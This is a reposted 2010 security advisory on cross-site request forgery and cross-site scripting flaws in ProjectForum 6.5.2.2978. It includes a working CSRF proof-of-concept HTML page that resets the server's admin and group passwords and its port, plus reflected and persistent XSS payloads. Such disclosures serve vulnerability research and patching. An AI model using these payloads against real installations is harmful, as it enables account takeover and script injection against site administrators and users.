Home / os / win7

projectforum-xsrfxss.txt

Posted on 15 May 2010

<!--=========================================================================================================#
#   _      _   __   __       __        _______    _____      __ __     _____     _      _    _____  __ __    #
#  /_/  /\_ /\_ /\_     /\_     /\_______) ) ___ (    /_/\__/  ) ___ (   /_/  /\_ /\_____/_/\__/  #
#  ) ) )( ( ( /_/( ( (    ( ( (     (___  __// /\_/    ) ) ) ) )/ /\_/   ) ) )( ( (( (_____/) ) ) ) ) #
# /_/ //\ \_ /\_\ \_     \_      / / /   / /_/ (_  /_/ /_/ // /_/ (_ /_/ //\ \_\ \__ /_/ /_/_/  #
#   /   / // / // / /__  / / /__   ( ( (      )_/ / /   \_/   )_/ / /  /   / // /__/_      #
#  )_) / (_(( (_(( (_____(( (_____(          /_/ /   )_) )     /_/ /  )_) / (_(( (_____)_) )   #
#  \_/  /_/ /_/ /_____/ /_____/   /_/_/     )_____(    \_/      )_____(   \_/  /_/ /_____/\_/ \_/ #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# Vulnerability............Cross-site Request Forgery / Cross-site Scripting                                 #
# Software.................ProjectForum 6.5.2.2978                                                           #
# Download.................http://www.projectforum.com/pf/                                                   #
# Date.....................5/13/10                                                                           #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# Site.....................http://cross-site-scripting.blogspot.com/                                         #
# Email....................john.leitch5@gmail.com                                                            #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# ##Description##                                                                                            #
#                                                                                                            #
# A cross-site request forgery vunlerability in ProjectForum 6.5.2.2978 can be exploited to reconfigure the  #
# server (e.g. admin password, create group password, port) with a malicious GET request.                    #
#                                                                                                            #
#                                                                                                            #
# ##Proof of Concept##                                                                                     -->
<html>
<body>
<img src="http://localhost/admin/site.html?adminpasswd=new_password&adminpasswd2=new_password&port=80&theme=default&createpasswd=new_password&createpasswd2=new_password&action=Save+Changes&formSubmitted=1" />
</body>
</html>
<!--
#                                                                                                            #
#                                                                                                            #
# ##Description##                                                                                            #
#                                                                                                            #
# Several reflected and persistent cross-site scripting vulnerabilities are present.                         #
#                                                                                                            #
#                                                                                                            #
# ##Proof of Concept##                                                                                       #
#                                                                                                            #
# Reflected: http://localhost/1/admin/newpage.html?name=%22%3E%3Cscript%3Ealert(0)%3C/script%3E              #
#                                                                                                            #
# Persistent: Edit a page and add the following                                                              #
# http://"onmouseover="alert(0)"style="position:absolute;top:0;left:0;width:9999px;height:9999px;            #
#                                                                                                            #
#                                                                                                          -->

 

TOP

Malware :

Exploits :